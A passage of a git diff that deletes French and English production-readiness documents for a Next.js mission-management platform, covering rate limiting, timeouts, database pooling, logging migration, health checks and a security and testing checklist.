Secrets dans les Logs - -#### ⚠️ Risque Modéré - -**Problème:** Vérifier que les mots de passe/tokens ne sont pas loggés. - -**Fichiers à vérifier:** -- `lib/services/email-service.ts` - Credentials IMAP -- `app/api/courrier/test-connection/route.ts` - Password dans logs - -**Solution actuelle (bonne):** -```typescript -// ✅ BON - app/api/courrier/test-connection/route.ts -console.log('Testing connection with:', { - ...body, - password: body.password ? '***' : undefined // Masqué -}); -``` - -### 2. Rate Limiting - -#### ❌ Manquant - -**Problème:** Pas de rate limiting sur les API routes. - -**Recommandation:** Implémenter avec `@upstash/ratelimit` ou middleware Next.js: -```typescript -// middleware.ts -import { Ratelimit } from '@upstash/ratelimit'; -import { Redis } from '@upstash/redis'; - -const ratelimit = new Ratelimit({ - redis: Redis.fromEnv(), - limiter: Ratelimit.slidingWindow(10, '10 s'), -}); - -export async function middleware(request: NextRequest) { - const ip = request.ip ?? '127.0.0.1'; - const { success } = await ratelimit.limit(ip); - - if (!success) { - return new Response('Rate limit exceeded', { status: 429 }); - } -} -``` - -### 3. CORS et Headers Sécurité - -#### ✅ Bon - -**Fichier:** `next.config.mjs` -- Content-Security-Policy configuré -- Headers de sécurité à ajouter si nécessaire - ---- - -## 🎯 Recommandations Prioritaires - -### Priorité 1 - CRITIQUE (Avant Production) - -1. **✅ Configurer le pool de connexions Prisma** - - Modifier `DATABASE_URL` avec `connection_limit=10&pool_timeout=20` - - Tester sous charge - -2. **✅ Corriger le Dockerfile** - - Retirer `migrate dev` - - Utiliser `migrate deploy` uniquement si nécessaire - -3. **✅ Ajouter des timeouts sur toutes les requêtes HTTP** - - Créer un utilitaire `fetchWithTimeout` - - Appliquer à tous les `fetch()` externes - -4. **✅ Remplacer console.log par logger** - - Script de migration automatique - - Vérifier tous les fichiers - -### Priorité 2 - HAUTE (Semaine 1) - -5. **✅ Implémenter Circuit Breaker** - - Pour N8N, Leantime, RocketChat - - Retry avec backoff exponentiel - -6. **✅ Activer l'optimisation d'images Next.js** - - Modifier `next.config.mjs` - - Tester les performances - -7. **✅ Ajouter Rate Limiting** - - Sur les API routes critiques - - Monitoring des limites - -### Priorité 3 - MOYENNE (Semaine 2-3) - -8. **✅ Cache des requêtes DB fréquentes** - - Missions, Calendars, Users - - TTL approprié (60-300s) - -9. **✅ Monitoring et Métriques** - - Intégrer Sentry ou équivalent - - Métriques de performance (APM) - -10. 
**✅ Optimiser les requêtes N+1** - - Audit des `include` Prisma - - Utiliser `select` quand possible - ---- - -## ✅ Checklist de Mise en Production - -### Pré-Déploiement - -#### Configuration -- [ ] Configurer `DATABASE_URL` avec pool settings -- [ ] Vérifier toutes les variables d'environnement -- [ ] Créer script de validation des env vars -- [ ] Configurer les secrets dans Vercel (pas en code) - -#### Code -- [ ] Corriger le Dockerfile (retirer `migrate dev`) -- [ ] Ajouter timeouts sur toutes les requêtes HTTP -- [ ] Remplacer tous les `console.log` par `logger` -- [ ] Activer l'optimisation d'images Next.js -- [ ] Corriger les erreurs TypeScript/ESLint (ou documenter pourquoi ignorées) - -#### Base de Données -- [ ] Appliquer toutes les migrations Prisma -- [ ] Créer des index sur les colonnes fréquemment queryées -- [ ] Configurer les sauvegardes automatiques -- [ ] Tester la restauration depuis backup - -#### Sécurité -- [ ] Implémenter rate limiting -- [ ] Vérifier qu'aucun secret n'est loggé -- [ ] Configurer CORS correctement -- [ ] Activer HTTPS uniquement - -#### Monitoring -- [ ] Configurer Sentry ou équivalent -- [ ] Créer endpoint `/api/health` -- [ ] Configurer les alertes Vercel -- [ ] Documenter les procédures d'alerte - -### Déploiement - -#### Staging -- [ ] Déployer en staging d'abord -- [ ] Tester toutes les fonctionnalités critiques -- [ ] Vérifier les performances sous charge -- [ ] Tester les scénarios d'erreur - -#### Production -- [ ] Appliquer les migrations Prisma -- [ ] Déployer sur Vercel -- [ ] Vérifier les health checks -- [ ] Monitorer les logs les premières heures -- [ ] Tester les fonctionnalités critiques - -### Post-Déploiement - -#### Monitoring -- [ ] Surveiller les métriques de performance -- [ ] Vérifier les logs d'erreurs -- [ ] Monitorer l'utilisation DB/Redis -- [ ] Vérifier les alertes fonctionnent - -#### Optimisation Continue -- [ ] Analyser les requêtes DB lentes -- [ ] Optimiser les endpoints les plus utilisés -- [ ] Ajuster les TTL de cache selon l'usage -- [ ] Réviser les timeouts selon les métriques - ---- - -## 📊 Métriques de Succès - -### Performance -- **Temps de réponse API:** < 200ms (p95) -- **Temps de chargement page:** < 2s (First Contentful Paint) -- **Taux d'erreur:** < 0.1% -- **Uptime:** > 99.9% - -### Base de Données -- **Connexions actives:** < 80% du pool max -- **Requêtes lentes:** < 1% des requêtes > 1s -- **Taux de cache hit:** > 70% pour les requêtes fréquentes - -### Infrastructure -- **CPU utilisation:** < 70% en moyenne -- **Mémoire:** < 80% en moyenne -- **Disque:** < 80% utilisé - ---- - -## 🔧 Scripts Utiles - -### Validation Environnement -```bash -# scripts/validate-production.sh -#!/bin/bash -set -e - -echo "Validating production environment..." 
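# NB : avec `set -e` (ci-dessus), le script s'arrête au premier contrôle en échec.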
- -# Vérifier les variables d'environnement -node scripts/validate-env.ts - -# Vérifier les migrations -npx prisma migrate status - -# Vérifier la connexion DB -npx prisma db execute --stdin <<< "SELECT 1" - -# Vérifier Redis -redis-cli -h $REDIS_HOST -p $REDIS_PORT ping - -echo "✅ All checks passed" -``` - -### Migration Console.log -```bash -# scripts/migrate-console-logs.sh -#!/bin/bash - -find lib/services app/api -name "*.ts" -type f | while read file; do - sed -i '' 's/console\.log(/logger.debug(/g' "$file" - sed -i '' 's/console\.error(/logger.error(/g' "$file" - sed -i '' 's/console\.warn(/logger.warn(/g' "$file" - sed -i '' 's/console\.debug(/logger.debug(/g' "$file" -done - -echo "✅ Console logs migrated to logger" -``` - -### Health Check -```typescript -// app/api/health/route.ts -import { NextResponse } from 'next/server'; -import { prisma } from '@/lib/prisma'; -import { getRedisClient } from '@/lib/redis'; - -export async function GET() { - const health = { - status: 'ok', - timestamp: new Date().toISOString(), - checks: { - database: 'unknown', - redis: 'unknown', - }, - }; - - // Check DB - try { - await prisma.$queryRaw`SELECT 1`; - health.checks.database = 'ok'; - } catch (error) { - health.checks.database = 'error'; - health.status = 'degraded'; - } - - // Check Redis - try { - const redis = getRedisClient(); - await redis.ping(); - health.checks.redis = 'ok'; - } catch (error) { - health.checks.redis = 'error'; - health.status = 'degraded'; - } - - return NextResponse.json(health, { - status: health.status === 'ok' ? 200 : 503, - }); -} -``` - ---- - -## 📚 Ressources - -- [Prisma Connection Pooling](https://www.prisma.io/docs/guides/performance-and-optimization/connection-management) -- [Next.js Production Checklist](https://nextjs.org/docs/deployment#production-checklist) -- [Vercel Best Practices](https://vercel.com/docs/concepts/deployments/best-practices) -- [PostgreSQL Performance Tuning](https://www.postgresql.org/docs/current/performance-tips.html) - ---- - -## 📝 Notes Finales - -Cette analyse identifie les problèmes critiques à résoudre avant la mise en production. Les priorités 1 doivent être traitées immédiatement, les priorités 2 dans la semaine, et les priorités 3 peuvent être planifiées après le déploiement initial. - -**Recommandation:** Créer des tickets pour chaque point de la checklist et les suivre jusqu'à résolution complète. - ---- - -**Dernière mise à jour:** $(date) diff --git a/PRODUCTION_FIXES_APPLIED.md b/PRODUCTION_FIXES_APPLIED.md deleted file mode 100644 index 450ef0b..0000000 --- a/PRODUCTION_FIXES_APPLIED.md +++ /dev/null @@ -1,290 +0,0 @@ -# Corrections Appliquées pour la Production - -Ce document liste les corrections critiques appliquées suite à l'analyse de performance et de préparation à la production. - -## ✅ Corrections Appliquées - -### 1. Utilitaire fetchWithTimeout - -**Fichier créé:** `lib/utils/fetch-with-timeout.ts` - -**Problème résolu:** Requêtes HTTP sans timeout pouvant bloquer indéfiniment. 
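
À titre indicatif, une implémentation possible de cet utilitaire (esquisse fondée sur le pattern AbortController décrit dans l'analyse ; la signature réelle de `lib/utils/fetch-with-timeout.ts` peut différer) :

```typescript
// Esquisse hypothétique de fetchWithTimeout (timeout par défaut : 30 s).
interface FetchWithTimeoutOptions extends RequestInit {
  timeout?: number; // en millisecondes
}

export async function fetchWithTimeout(
  url: string,
  options: FetchWithTimeoutOptions = {}
): Promise<Response> {
  const { timeout = 30000, ...init } = options;
  const controller = new AbortController();
  const timeoutId = setTimeout(() => controller.abort(), timeout);
  try {
    return await fetch(url, { ...init, signal: controller.signal });
  } catch (error: any) {
    if (error?.name === 'AbortError') {
      throw new Error(`Request timeout after ${timeout}ms: ${url}`);
    }
    throw error;
  } finally {
    clearTimeout(timeoutId);
  }
}
```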
- -**Utilisation:** -```typescript -import { fetchWithTimeout, fetchJsonWithTimeout } from '@/lib/utils/fetch-with-timeout'; - -// Exemple 1: Fetch simple avec timeout -const response = await fetchWithTimeout('https://api.example.com/data', { - method: 'GET', - timeout: 10000, // 10 secondes - headers: { 'Authorization': 'Bearer token' } -}); - -// Exemple 2: Fetch avec parsing JSON automatique -const data = await fetchJsonWithTimeout('https://api.example.com/data', { - method: 'POST', - timeout: 30000, // 30 secondes - headers: { 'Content-Type': 'application/json' }, - body: JSON.stringify(payload) -}); -``` - -**Migration recommandée:** -Remplacer tous les `fetch()` dans: -- `lib/services/n8n-service.ts` -- `app/api/missions/[missionId]/generate-plan/route.ts` -- `app/api/users/[userId]/route.ts` -- `app/api/leantime/tasks/route.ts` -- `app/api/rocket-chat/messages/route.ts` - -### 2. Correction Dockerfile - -**Fichier modifié:** `Dockerfile` - -**Problème résolu:** Utilisation de `migrate dev` en production (créerait de nouvelles migrations). - -**Changement:** -```dockerfile -# ❌ AVANT -RUN npx prisma migrate dev --name init - -# ✅ APRÈS -# NOTE: Migrations should be run separately before deployment -# DO NOT use 'migrate dev' in production -# Use 'prisma migrate deploy' instead, run separately before container start -``` - -**Action requise:** Utiliser `Dockerfile.prod` pour la production, qui est déjà correctement configuré. - -### 3. Script de Validation d'Environnement - -**Fichier créé:** `scripts/validate-env.ts` - -**Problème résolu:** Variables d'environnement manquantes non détectées avant déploiement. - -**Utilisation:** -```bash -# Valider les variables d'environnement -npm run validate:env - -# Ou directement -ts-node scripts/validate-env.ts -``` - -**Fonctionnalités:** -- ✅ Vérifie toutes les variables requises -- ✅ Valide le format des URLs -- ✅ Vérifie la force de NEXTAUTH_SECRET -- ✅ Recommande les paramètres de pool DB -- ✅ Affiche des warnings pour les variables optionnelles - -**Ajouté dans package.json:** -```json -"validate:env": "ts-node scripts/validate-env.ts" -``` - -## 🔄 Migrations à Effectuer - -### Priorité 1 - CRITIQUE - -#### 1. Remplacer fetch() par fetchWithTimeout() - -**Fichiers à modifier:** - -1. **lib/services/n8n-service.ts** -```typescript -// ❌ AVANT -const response = await fetch(this.webhookUrl, { - method: 'POST', - headers: { 'Content-Type': 'application/json', 'x-api-key': this.apiKey }, - body: JSON.stringify(cleanData), -}); - -// ✅ APRÈS -import { fetchWithTimeout } from '@/lib/utils/fetch-with-timeout'; - -const response = await fetchWithTimeout(this.webhookUrl, { - method: 'POST', - timeout: 30000, // 30 secondes - headers: { 'Content-Type': 'application/json', 'x-api-key': this.apiKey }, - body: JSON.stringify(cleanData), -}); -``` - -2. **app/api/missions/[missionId]/generate-plan/route.ts** -```typescript -// ❌ AVANT -const response = await fetch(webhookUrl, { - method: 'POST', - headers: { 'Content-Type': 'application/json', 'x-api-key': apiKey }, - body: JSON.stringify(webhookData), -}); - -// ✅ APRÈS -import { fetchWithTimeout } from '@/lib/utils/fetch-with-timeout'; - -const response = await fetchWithTimeout(webhookUrl, { - method: 'POST', - timeout: 30000, - headers: { 'Content-Type': 'application/json', 'x-api-key': apiKey }, - body: JSON.stringify(webhookData), -}); -``` - -3. 
**app/api/users/[userId]/route.ts** (getLeantimeUserId) -```typescript -// ❌ AVANT -const userResponse = await fetch('https://agilite.slm-lab.net/api/jsonrpc', { - method: 'POST', - headers: { 'Content-Type': 'application/json', 'X-API-Key': process.env.LEANTIME_TOKEN || '' }, - body: JSON.stringify({ ... }), -}); - -// ✅ APRÈS -import { fetchJsonWithTimeout } from '@/lib/utils/fetch-with-timeout'; - -const userData = await fetchJsonWithTimeout('https://agilite.slm-lab.net/api/jsonrpc', { - method: 'POST', - timeout: 10000, // 10 secondes - headers: { 'Content-Type': 'application/json', 'X-API-Key': process.env.LEANTIME_TOKEN || '' }, - body: JSON.stringify({ ... }), -}); -``` - -#### 2. Configurer le Pool de Connexions Prisma - -**Action:** Modifier `DATABASE_URL` dans les variables d'environnement: - -```bash -# ❌ AVANT -DATABASE_URL=postgresql://user:pass@host:5432/db - -# ✅ APRÈS -DATABASE_URL=postgresql://user:pass@host:5432/db?connection_limit=10&pool_timeout=20&connect_timeout=10 -``` - -**Paramètres recommandés:** -- `connection_limit=10` - Limite le nombre de connexions simultanées -- `pool_timeout=20` - Timeout pour obtenir une connexion du pool (secondes) -- `connect_timeout=10` - Timeout pour établir une connexion (secondes) - -**Note:** Ajuster `connection_limit` selon la charge attendue et les limites du serveur PostgreSQL. - -#### 3. Remplacer console.log par logger - -**Script de migration:** -```bash -# Créer scripts/migrate-console-logs.sh -#!/bin/bash - -find lib/services app/api -name "*.ts" -type f | while read file; do - # Sauvegarder d'abord - cp "$file" "$file.bak" - - # Remplacer - sed -i '' 's/console\.log(/logger.debug(/g' "$file" - sed -i '' 's/console\.error(/logger.error(/g' "$file" - sed -i '' 's/console\.warn(/logger.warn(/g' "$file" - sed -i '' 's/console\.debug(/logger.debug(/g' "$file" - - # Vérifier que logger est importé - if ! grep -q "import.*logger" "$file" && grep -q "logger\." "$file"; then - # Ajouter l'import en haut du fichier - sed -i '' '1i\ -import { logger } from '\''@/lib/logger'\''; -' "$file" - fi -done - -echo "✅ Console logs migrated to logger" -echo "⚠️ Review changes and remove .bak files after verification" -``` - -**Fichiers prioritaires:** -- `lib/services/rocketchat-call-listener.ts` (35 occurrences) -- `lib/services/refresh-manager.ts` (19 occurrences) -- `lib/services/prefetch-service.ts` (17 occurrences) - -### Priorité 2 - HAUTE - -#### 4. Activer l'Optimisation d'Images Next.js - -**Fichier:** `next.config.mjs` - -```javascript -// ❌ AVANT -images: { - unoptimized: true, -}, - -// ✅ APRÈS -images: { - unoptimized: false, - formats: ['image/avif', 'image/webp'], - deviceSizes: [640, 750, 828, 1080, 1200], - imageSizes: [16, 32, 48, 64, 96, 128, 256, 384], -}, -``` - -#### 5. Implémenter Circuit Breaker - -Créer `lib/utils/circuit-breaker.ts` (voir exemple dans `PERFORMANCE_AND_PRODUCTION_ANALYSIS.md`). 
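
Exemple d'utilisation combinée avec `fetchWithTimeout` (esquisse ; `callN8nWebhook` et l'export de `CircuitBreaker` sont hypothétiques) :

```typescript
// Esquisse : protéger un appel N8N avec circuit breaker + timeout.
import { CircuitBreaker } from '@/lib/utils/circuit-breaker'; // export supposé
import { fetchWithTimeout } from '@/lib/utils/fetch-with-timeout';

const n8nBreaker = new CircuitBreaker();

export async function callN8nWebhook(url: string, payload: unknown): Promise<Response> {
  // Si le breaker est OPEN (après 5 échecs consécutifs), l'appel échoue
  // immédiatement au lieu d'attendre le timeout de 30 s.
  return n8nBreaker.execute(() =>
    fetchWithTimeout(url, {
      method: 'POST',
      timeout: 30000,
      headers: { 'Content-Type': 'application/json' },
      body: JSON.stringify(payload),
    })
  );
}
```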
**Services to protect:**
- N8N webhooks
- Leantime API
- RocketChat API

## 📋 Migration Checklist

- [ ] Replace every `fetch()` with `fetchWithTimeout()` in the files listed above
- [ ] Configure `DATABASE_URL` with the pool parameters
- [ ] Run the console.log migration script
- [ ] Verify that every file uses `logger` instead of `console`
- [ ] Enable image optimization in `next.config.mjs`
- [ ] Test all features after the changes
- [ ] Validate the environment with `npm run validate:env`
- [ ] Deploy to staging and test
- [ ] Monitor performance after deployment

## 🧪 Recommended Tests

### Timeout Test
```typescript
// Check that timeouts actually fire
const start = Date.now();
try {
  await fetchWithTimeout('https://httpstat.us/200?sleep=5000', {
    timeout: 2000, // 2 seconds
  });
} catch (error) {
  const duration = Date.now() - start;
  console.assert(duration < 3000, 'Timeout should occur before 3 seconds');
  console.assert(error.message.includes('timeout'), 'Error should mention timeout');
}
```

### Environment Validation Test
```bash
# Test with a missing variable
unset DATABASE_URL
npm run validate:env
# Should fail with a clear message

# Test with every variable set
# Should succeed
npm run validate:env
```

## 📚 Documentation

See `PERFORMANCE_AND_PRODUCTION_ANALYSIS.md` for:
- The full problem analysis
- Detailed recommendations
- Success metrics
- The complete production-readiness checklist

---

**Last updated:** $(date)
diff --git a/PRODUCTION_VIABILITY_ASSESSMENT.md b/PRODUCTION_VIABILITY_ASSESSMENT.md deleted file mode 100644 index 74ab076..0000000 --- a/PRODUCTION_VIABILITY_ASSESSMENT.md +++ /dev/null @@ -1,680 +0,0 @@
-# Production Viability Assessment - Neah Platform

**Assessment Date:** January 2026
**Assessed By:** Senior Software Architect
**Project:** Neah - Mission Management & Calendar Platform
**Status:** ⚠️ **CONDITIONAL APPROVAL** - Requires Critical Fixes Before Production

---

## Executive Summary

The Neah platform is a Next.js-based mission management system with calendar integration, email management, and multiple third-party integrations (Keycloak, Leantime, RocketChat, N8N, etc.). While the application demonstrates solid architectural foundations and comprehensive documentation, **several critical issues must be addressed before production deployment**.
- -### Overall Assessment: **6.5/10** - Conditional Approval - -**Key Strengths:** -- ✅ Comprehensive documentation (deployment, runbook, observability) -- ✅ Modern tech stack (Next.js 16, Prisma, PostgreSQL, Redis) -- ✅ Health check endpoint implemented -- ✅ Environment variable validation with Zod -- ✅ Structured logging system -- ✅ Docker production configuration - -**Critical Blockers:** -- 🔴 **TypeScript/ESLint errors ignored in production builds** (next.config.mjs) -- 🔴 **No automated testing infrastructure** -- 🔴 **Security incident history** (backdoor vulnerability - resolved but requires audit) -- 🔴 **Excessive console.log statements** in production code -- 🔴 **No rate limiting** on API endpoints -- 🔴 **Missing environment variable validation** for many critical vars - -**High Priority Issues:** -- 🟡 Database connection pooling not explicitly configured -- 🟡 No request timeout middleware -- 🟡 Missing input validation on some API routes -- 🟡 No automated backup strategy documented -- 🟡 Limited error recovery mechanisms - ---- - -## 1. Architecture & Infrastructure - -### 1.1 Application Architecture - -**Status:** ✅ **Good** - -- **Framework:** Next.js 16.1.1 (App Router) -- **Deployment:** Vercel (serverless functions) -- **Database:** PostgreSQL 15 (self-hosted) -- **Cache:** Redis (self-hosted) -- **Storage:** S3-compatible (MinIO) - -**Strengths:** -- Modern serverless architecture suitable for scaling -- Clear separation of concerns (API routes, services, lib) -- Proper use of Next.js App Router patterns - -**Concerns:** -- No clear strategy for handling cold starts on Vercel -- Database connection from serverless functions may have latency issues -- No CDN configuration for static assets - -**Recommendations:** -- [ ] Implement database connection pooling at Prisma level -- [ ] Configure Vercel Edge Functions for high-frequency endpoints -- [ ] Set up CDN for static assets and images - -### 1.2 Infrastructure Configuration - -**Status:** ⚠️ **Needs Improvement** - -**Docker Configuration:** -- ✅ Production Dockerfile with multi-stage builds -- ✅ Non-root user in production image -- ✅ Health checks configured -- ⚠️ Resource limits defined but may need tuning -- ⚠️ No backup strategy in docker-compose.prod.yml - -**Vercel Configuration:** -- ✅ Proper build commands -- ✅ Security headers configured -- ⚠️ Function timeout set to 30s (may be insufficient for some operations) -- ⚠️ No region configuration for database proximity - -**Recommendations:** -- [ ] Add automated backup cron job to docker-compose.prod.yml -- [ ] Configure Vercel regions closer to database server -- [ ] Review and optimize function timeouts per endpoint - ---- - -## 2. Security Assessment - -### 2.1 Critical Security Issues - -**Status:** 🔴 **CRITICAL CONCERNS** - -#### Issue 1: Build Error Suppression -```javascript -// next.config.mjs -eslint: { - ignoreDuringBuilds: true, // ❌ DANGEROUS -}, -typescript: { - ignoreBuildErrors: true, // ❌ DANGEROUS -} -``` - -**Risk:** Type errors and linting issues can introduce runtime bugs in production. 
- -**Impact:** HIGH - Could lead to production failures - -**Recommendation:** -- [ ] **MUST FIX:** Remove error suppression, fix all TypeScript/ESLint errors -- [ ] Set up pre-commit hooks to prevent errors from reaching production -- [ ] Use CI/CD to block deployments with errors - -#### Issue 2: Security Incident History -- Previous backdoor vulnerability (CVE-2025-66478) in Next.js 15.3.1 -- **Status:** ✅ Resolved (upgraded to Next.js 16.1.1) -- **Action Required:** Security audit of all configuration files - -**Recommendations:** -- [ ] Complete security audit of all config files -- [ ] Review all dynamic imports -- [ ] Implement file integrity monitoring -- [ ] Set up automated security scanning (Snyk, npm audit) - -#### Issue 3: Missing Rate Limiting -**Status:** 🔴 **CRITICAL** - -No rate limiting found on API endpoints. This exposes the application to: -- DDoS attacks -- Brute force attacks -- Resource exhaustion - -**Recommendations:** -- [ ] Implement rate limiting middleware (e.g., `@upstash/ratelimit`) -- [ ] Configure per-endpoint limits -- [ ] Add IP-based throttling -- [ ] Set up Redis-based distributed rate limiting - -#### Issue 4: Environment Variable Validation -**Status:** ⚠️ **PARTIAL** - -**Current State:** -- ✅ Basic validation in `lib/env.ts` using Zod -- ❌ Many critical variables not validated (N8N_API_KEY, S3 credentials, etc.) - -**Missing Validations:** -- `N8N_API_KEY` (required but not in schema) -- `MINIO_ACCESS_KEY`, `MINIO_SECRET_KEY` -- `S3_BUCKET` -- `NEXTAUTH_SECRET` (should be validated for strength) - -**Recommendations:** -- [ ] Expand `env.ts` schema to include ALL environment variables -- [ ] Add validation for secret strength (NEXTAUTH_SECRET min length) -- [ ] Fail fast on missing critical variables at startup - -### 2.2 Authentication & Authorization - -**Status:** ✅ **Good** - -- ✅ NextAuth.js with Keycloak provider -- ✅ JWT-based sessions (4-hour timeout) -- ✅ Role-based access control -- ✅ Session refresh mechanism - -**Concerns:** -- ⚠️ Some API routes have inconsistent auth checks -- ⚠️ No API key rotation strategy documented - -**Recommendations:** -- [ ] Standardize auth middleware across all API routes -- [ ] Implement API key rotation for N8N integration -- [ ] Add audit logging for authentication events - -### 2.3 Data Security - -**Status:** ⚠️ **Needs Review** - -**Database:** -- ✅ Passwords stored (assumed hashed, need verification) -- ⚠️ No encryption at rest mentioned -- ⚠️ Connection strings in environment (should use secrets manager) - -**File Storage:** -- ✅ S3-compatible storage -- ⚠️ No file size limits enforced -- ⚠️ No virus scanning mentioned - -**Recommendations:** -- [ ] Verify password hashing implementation (bcrypt with proper salt rounds) -- [ ] Implement file upload size limits -- [ ] Add file type validation -- [ ] Consider encryption at rest for sensitive data - ---- - -## 3. 
Code Quality - -### 3.1 TypeScript & Type Safety - -**Status:** 🔴 **CRITICAL** - -**Issues:** -- TypeScript errors ignored in builds (`ignoreBuildErrors: true`) -- No strict null checks enforced -- Some `any` types found in codebase - -**Impact:** Runtime errors, difficult debugging, poor developer experience - -**Recommendations:** -- [ ] **MUST FIX:** Remove `ignoreBuildErrors`, fix all TypeScript errors -- [ ] Enable strict mode in tsconfig.json -- [ ] Add type coverage tooling -- [ ] Set up pre-commit hooks for type checking - -### 3.2 Code Practices - -**Status:** ⚠️ **Needs Improvement** - -**Issues Found:** -- 🔴 **80+ console.log/console.error statements** in production code -- ⚠️ Inconsistent error handling patterns -- ⚠️ Some API routes lack input validation -- ⚠️ No request timeout middleware - -**Console.log Locations:** -- `app/courrier/page.tsx` - Multiple console.log statements -- `app/api/courrier/unread-counts/route.ts` - console.log in production -- `lib/utils/request-deduplication.ts` - console.log statements -- Many more throughout the codebase - -**Recommendations:** -- [ ] Replace all `console.log` with proper logger calls -- [ ] Implement request timeout middleware -- [ ] Add input validation middleware (Zod schemas) -- [ ] Standardize error response format - -### 3.3 Error Handling - -**Status:** ⚠️ **Inconsistent** - -**Good Practices Found:** -- ✅ Structured logging with logger utility -- ✅ Try-catch blocks in most API routes -- ✅ Error cleanup in mission creation (file deletion on failure) - -**Issues:** -- ⚠️ Some errors return generic messages without context -- ⚠️ No global error boundary for API routes -- ⚠️ Database errors not always handled gracefully - -**Recommendations:** -- [ ] Implement global error handler middleware -- [ ] Add error codes for better client-side handling -- [ ] Implement retry logic for transient failures -- [ ] Add circuit breakers for external service calls - ---- - -## 4. 
Database & Data Management - -### 4.1 Database Schema - -**Status:** ✅ **Good** - -- ✅ Prisma ORM with proper schema definition -- ✅ Indexes on foreign keys and frequently queried fields -- ✅ Cascade deletes configured appropriately -- ✅ UUID primary keys - -**Concerns:** -- ⚠️ No database migration rollback strategy documented -- ⚠️ No data retention policies defined - -**Recommendations:** -- [ ] Document migration rollback procedures -- [ ] Define data retention policies -- [ ] Add database versioning strategy - -### 4.2 Connection Management - -**Status:** ⚠️ **Needs Configuration** - -**Current State:** -- Prisma Client with default connection pooling -- No explicit connection pool configuration -- Redis connection with retry logic (good) - -**Issues:** -- No connection pool size limits -- No connection timeout configuration -- Potential connection exhaustion under load - -**Recommendations:** -- [ ] Configure Prisma connection pool: - ```prisma - datasource db { - provider = "postgresql" - url = env("DATABASE_URL") - // Add connection pool settings - } - ``` -- [ ] Set appropriate pool size based on Vercel function concurrency -- [ ] Add connection monitoring - -### 4.3 Data Backup & Recovery - -**Status:** ⚠️ **Incomplete** - -**Current State:** -- ✅ Backup procedures documented in RUNBOOK.md -- ❌ No automated backup system -- ❌ No backup retention policy -- ❌ No backup testing procedure - -**Recommendations:** -- [ ] Implement automated daily backups -- [ ] Set up backup retention (30 days minimum) -- [ ] Test restore procedures monthly -- [ ] Add backup verification checks - ---- - -## 5. Testing - -### 5.1 Test Coverage - -**Status:** 🔴 **CRITICAL - NO TESTS FOUND** - -**Current State:** -- ❌ No unit tests -- ❌ No integration tests -- ❌ No E2E tests -- ❌ No test infrastructure - -**Impact:** HIGH - No confidence in code changes, high risk of regressions - -**Recommendations:** -- [ ] **MUST IMPLEMENT:** Set up Jest/Vitest for unit tests -- [ ] Add integration tests for critical API routes -- [ ] Implement E2E tests for critical user flows -- [ ] Set up CI/CD to run tests on every PR -- [ ] Target: 70%+ code coverage for critical paths - -**Priority Test Areas:** -1. Authentication flows -2. Mission creation/update/deletion -3. File upload handling -4. Calendar sync operations -5. Email integration - ---- - -## 6. Performance & Scalability - -### 6.1 Performance Optimizations - -**Status:** ⚠️ **Partial** - -**Good Practices:** -- ✅ Redis caching implemented -- ✅ Request deduplication for email operations -- ✅ Connection pooling for IMAP -- ✅ Background refresh for unread counts - -**Missing:** -- ❌ No CDN for static assets -- ❌ No image optimization pipeline -- ❌ No query result pagination on some endpoints -- ❌ No database query optimization monitoring - -**Recommendations:** -- [ ] Implement CDN (Vercel Edge Network or Cloudflare) -- [ ] Add image optimization (Next.js Image component) -- [ ] Add pagination to all list endpoints -- [ ] Set up query performance monitoring -- [ ] Implement database query logging in development - -### 6.2 Scalability Concerns - -**Status:** ⚠️ **Needs Planning** - -**Potential Bottlenecks:** -1. **Database Connections:** Serverless functions may exhaust pool -2. **Redis Connection:** Single Redis instance (no clustering) -3. **File Storage:** No CDN, direct S3 access -4. **External APIs:** No circuit breakers for N8N, Leantime, etc. 
- -**Recommendations:** -- [ ] Plan for database read replicas -- [ ] Consider Redis Cluster for high availability -- [ ] Implement circuit breakers for external services -- [ ] Add load testing before production launch - ---- - -## 7. Monitoring & Observability - -### 7.1 Logging - -**Status:** ✅ **Good** - -- ✅ Structured logging with logger utility -- ✅ Log levels (info, warn, error, debug) -- ✅ Contextual information in logs - -**Issues:** -- ⚠️ Console.log statements still present (80+ instances) -- ⚠️ No log aggregation system configured -- ⚠️ No log retention policy - -**Recommendations:** -- [ ] Remove all console.log statements -- [ ] Set up log aggregation (Logtail, Datadog, or similar) -- [ ] Define log retention policy -- [ ] Add request ID tracking for distributed tracing - -### 7.2 Monitoring - -**Status:** ⚠️ **Basic** - -**Current State:** -- ✅ Health check endpoint (`/api/health`) -- ✅ Vercel Analytics available -- ❌ No APM (Application Performance Monitoring) -- ❌ No error tracking (Sentry not configured) -- ❌ No uptime monitoring - -**Recommendations:** -- [ ] Set up Sentry for error tracking -- [ ] Configure Vercel Analytics and Speed Insights -- [ ] Add uptime monitoring (Uptime Robot, Pingdom) -- [ ] Implement custom metrics dashboard -- [ ] Set up alerting for critical errors - -### 7.3 Observability - -**Status:** ⚠️ **Incomplete** - -**Documentation:** -- ✅ Comprehensive OBSERVABILITY.md document -- ❌ Not all recommendations implemented - -**Missing:** -- No distributed tracing -- No performance profiling -- No database query monitoring - -**Recommendations:** -- [ ] Implement distributed tracing (OpenTelemetry) -- [ ] Add performance profiling for slow endpoints -- [ ] Set up database query monitoring (pg_stat_statements) - ---- - -## 8. Documentation - -### 8.1 Technical Documentation - -**Status:** ✅ **Excellent** - -**Strengths:** -- ✅ Comprehensive DEPLOYMENT.md -- ✅ Detailed RUNBOOK.md with procedures -- ✅ OBSERVABILITY.md with monitoring strategy -- ✅ Multiple issue analysis documents -- ✅ API documentation in code comments - -**Recommendations:** -- [ ] Add API documentation (OpenAPI/Swagger) -- [ ] Document all environment variables in one place -- [ ] Create architecture diagram -- [ ] Add troubleshooting guide - -### 8.2 Operational Documentation - -**Status:** ✅ **Good** - -- ✅ Runbook with incident procedures -- ✅ Deployment procedures documented -- ✅ Rollback procedures defined - -**Missing:** -- On-call rotation documentation -- Escalation procedures -- Service level objectives (SLOs) - ---- - -## 9. Deployment & DevOps - -### 9.1 CI/CD Pipeline - -**Status:** ⚠️ **Basic** - -**Current State:** -- ✅ Vercel automatic deployments from Git -- ❌ No pre-deployment checks -- ❌ No automated testing in pipeline -- ❌ No staging environment mentioned - -**Recommendations:** -- [ ] Set up staging environment -- [ ] Add pre-deployment checks (tests, linting, type checking) -- [ ] Implement deployment gates -- [ ] Add automated smoke tests post-deployment - -### 9.2 Environment Management - -**Status:** ⚠️ **Needs Improvement** - -**Issues:** -- No `.env.example` file found -- Environment variables scattered across documentation -- No validation script for required variables - -**Recommendations:** -- [ ] Create comprehensive `.env.example` -- [ ] Add environment validation script -- [ ] Document all required variables in one place -- [ ] Use secrets manager for production (Vercel Secrets) - ---- - -## 10. 
